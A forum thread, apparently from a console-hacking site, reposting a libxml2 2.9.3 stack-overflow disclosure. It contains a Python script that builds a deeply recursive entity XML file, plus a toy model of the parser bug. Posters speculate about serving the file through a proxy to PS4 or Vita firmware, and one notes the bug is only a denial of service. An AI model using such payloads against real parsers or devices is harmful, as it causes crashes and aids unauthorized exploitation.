
Libxml2 (2.9.3 32bit) stack overflow, possible psvita port?

dragood2
Posts: 8
Joined: Tue Sep 22, 2015 5:01 am

Libxml2 (2.9.3 32bit) stack overflow, possible psvita port?

Post by dragood2 »

Hi
This is a disclosure of the following issue that was raised a week ago
on the distro's mailing list. Both bugs on the gnome bugtracker are
currently private and should be made public now.
A couple of weeks back while working on a related bug [CVE-2016-3627] I
discovered a specially created xml file is capable of triggering a stack
overflow before libxml2 can detect it's an invalid xml file.

We raised this issue upstream on 2016-04-18 and informed them that we
would place a two week embargo on the issue in case we didn't hear back.
As of yet we have had no response so we have posted here.
https://bugzilla.gnome.org/show_bug.cgi?id=765207

We intend to keep the current embargo (ending May 3) unless we get
advised otherwise here. Below is a script to generate the xml file.

The functions xmlParserEntityCheck() and xmlParseAttValueComplex() used
to call xmlStringDecodeEntities() in a recursive context without incrementing the 'depth' counter in the parser context. Because of that omission, the parser
failed to detect attribute recursions in certain documents before running out
of stack space.

Hope this helps guide those that have the skill to take it further.
Last edited by dragood2 on Thu May 05, 2016 3:45 am, edited 2 times in total.
dragood2
Posts: 8
Joined: Tue Sep 22, 2015 5:01 am

Re: Libxml2 exploit poc, possible ps4 port?

Post by dragood2 »

Script:
#!/usr/bin/env python3
# Generates repo.xml: a DTD declaring a chain of 30000 internal entities
# (a1 -> a2 -> ... -> a30000 -> a1), followed by an element whose attribute
# references a1. Decoding that attribute value recurses once per entity;
# with the 'depth' counter not incremented on the recursive path, libxml2
# runs out of stack before it can report the entity recursion.

N = 30000

with open('repo.xml', 'w') as f:
    f.write("<!DOCTYPE a [ ")
    for i in range(1, N):
        f.write('<!ENTITY a%d "&a%d;">' % (i, i + 1))
    # Close the loop: the last entity in the chain points back at a1.
    # (Declaring a%d for N+1 here would leave a30000 undeclared; the chain
    # is deep enough to exhaust the stack either way.)
    f.write('<!ENTITY a%d "&a1;">]> <bruces bogans="&a1;">' % N)
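To make the mechanism described in the posts above concrete, here is an added example that is not code from the post and not libxml2's own source: a toy entity table shaped like the one repo.xml declares, and a decoder modelled on xmlStringDecodeEntities() with a flag that reproduces the described omission (recursing without incrementing the depth counter). The name MAX_DEPTH and its value are assumptions standing in for libxml2's parser depth limit; the interpreter's RecursionError stands in for running out of native stack.

```python
"""Toy model of the entity-expansion recursion from the post above.

Constructed example, not libxml2 code: a dict-based entity table and a
decoder modelled on xmlStringDecodeEntities(). With track_depth=False the
decoder recurses without incrementing depth, which is the omission the
post describes; with track_depth=True the depth check catches the
attribute recursion long before the stack is exhausted.
"""

MAX_DEPTH = 256  # assumption: stands in for libxml2's parser depth limit


class EntityRecursion(Exception):
    """Raised when the depth-checked decoder refuses to go deeper."""


class UndefinedEntity(Exception):
    """Raised for a reference to an entity the DTD never declared."""


def build_chain(n):
    """Entity table with the shape repo.xml declares: a1 -> a2 -> ... -> a{n} -> a1."""
    table = {f"a{i}": f"&a{i + 1};" for i in range(1, n)}
    table[f"a{n}"] = "&a1;"
    return table


def decode_entities(table, value, track_depth=True, depth=0):
    """Expand &name; references in value using table.

    Every nested reference is decoded by a recursive call. If track_depth is
    True the call gets depth + 1 and the MAX_DEPTH check fires on a cycle or
    an over-long chain; if False the call reuses the caller's depth, so the
    check never fires and only the stack limit stops the recursion.
    """
    if depth > MAX_DEPTH:
        raise EntityRecursion(f"entity recursion deeper than {MAX_DEPTH}")
    out = []
    i = 0
    while i < len(value):
        if value[i] != "&":
            out.append(value[i])
            i += 1
            continue
        end = value.find(";", i)
        if end < 0:
            raise ValueError("unterminated entity reference")
        name = value[i + 1:end]
        if name not in table:
            raise UndefinedEntity(name)
        next_depth = depth + 1 if track_depth else depth
        out.append(decode_entities(table, table[name], track_depth, next_depth))
        i = end + 1
    return "".join(out)


def run(table, value, track_depth):
    """Return the decoded string, or a short label for how decoding failed."""
    try:
        return decode_entities(table, value, track_depth)
    except EntityRecursion:
        return "detected"
    except RecursionError:  # the interpreter's stand-in for a blown native stack
        return "stack exhausted"
    except UndefinedEntity as e:
        return f"undefined entity {e}"


if __name__ == "__main__":
    benign = {"x": "hello", "y": "&x; world"}
    print(run(benign, "&y;", True))        # hello world
    chain = build_chain(30000)             # same shape as repo.xml
    print(run(chain, "&a1;", True))        # detected
    print(run(chain, "&a1;", False))       # stack exhausted
```

The point the example makes is the one xyz raises later in the thread: with the counter incremented, the decoder returns a clean error after a bounded number of frames; without it, the same input is only stopped by the stack, which is a crash rather than a controlled write.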
wololo
Site Admin
Posts: 3621
Joined: Wed Oct 15, 2008 12:42 am
Location: Japan

Re: Libxml2 exploit poc, possible ps4 port?

Post by wololo »

Thanks.
It would be interesting to understand where the PS4 uses libxml2. I seem to recall lots of the data coming from the servers to display online information might be in xml format, wondering if it's encrypted though (in which case a proxy to serve the file for tests might not be enough). How about the browser?

Appreciate if people chime in on this one. There's a file to repro on the bugzilla link, for those too lazy to run the script from dragood2 :)
If you need US PSN Codes, this technique is what I recommend.

Looking for guest bloggers and news hunters here at wololo.net, PM me!
lazydog2055
Posts: 1
Joined: Wed May 04, 2016 11:40 pm

Re: Libxml2 exploit poc, possible ps4 port?

Post by lazydog2055 »

Looks like there was also an XML exploit in iOS and OS X. http://www.cvedetails.com/cve/CVE-2016-1762/

I remember with the beta firmwares Sony would push a special xml to the consoles telling them to download the fw based off of some info (likely console id). With updates they also use an xml referred from a link that a proxy would be able to see. If we instead point it to the xml in question ??? Might give this a try if I can set Charles up properly. It seems too simple and wouldn't surprise me if the web browser comes to be key.
wololo
Site Admin
Posts: 3621
Joined: Wed Oct 15, 2008 12:42 am
Location: Japan

Re: Libxml2 (2.9.3 32bit) stack overflow, possible psvita port?

Post by wololo »

Please make sure to always mention your sources when copy/pasting other people's stuff!
The source for reference: http://seclists.org/oss-sec/2016/q2/191
xyz
Posts: 61
Joined: Thu Jan 20, 2011 7:06 pm

Re: Libxml2 (2.9.3 32bit) stack overflow, possible psvita port?

Post by xyz »

it's useless
wololo
Site Admin
Posts: 3621
Joined: Wed Oct 15, 2008 12:42 am
Location: Japan

Re: Libxml2 (2.9.3 32bit) stack overflow, possible psvita port?

Post by wololo »

Can you detail why? Stack Protector, but besides that?
xyz
Posts: 61
Joined: Thu Jan 20, 2011 7:06 pm

Re: Libxml2 (2.9.3 32bit) stack overflow, possible psvita port?

Post by xyz »

It's stack exhaustion due to high recursion depth. As you can see from https://access.redhat.com/security/cve/cve-2016-3705 and https://access.redhat.com/security/cve/cve-2016-3627, both bugs only have availability impact, i.e. it's a DoS.
wololo
Site Admin
Posts: 3621
Joined: Wed Oct 15, 2008 12:42 am
Location: Japan

Re: Libxml2 (2.9.3 32bit) stack overflow, possible psvita port?

Post by wololo »

Thanks
Zecoxao
Posts: 280
Joined: Mon Sep 27, 2010 7:27 pm

Re: Libxml2 (2.9.3 32bit) stack overflow, possible psvita port?

Post by Zecoxao »

Image
My sig is original :D